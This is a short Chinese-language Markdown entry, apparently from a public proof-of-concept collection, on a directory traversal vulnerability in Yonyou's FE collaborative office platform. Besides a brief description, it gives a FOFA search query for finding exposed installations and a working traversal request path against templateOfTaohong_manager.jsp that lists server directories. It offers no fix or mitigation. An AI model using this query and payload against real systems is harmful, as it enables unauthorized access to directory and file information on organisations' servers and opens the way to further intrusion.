Awesome-POC/OA产品漏洞/用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞.md

31 lines
681 B
Markdown
Raw Normal View History

2022-05-20 15:57:09 +08:00
# 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
## 漏洞描述
用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞通过漏洞攻击者可以获取目录文件等信息导致进一步攻击
## 漏洞影响
```
用友 FE协作办公平台
```
## FOFA
```
"FE协作"
```
## 漏洞复现
登录页面
![image-20220520141413849](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201414968.png)
验证POC
```
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
```
![image-20220520141519859](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201415920.png)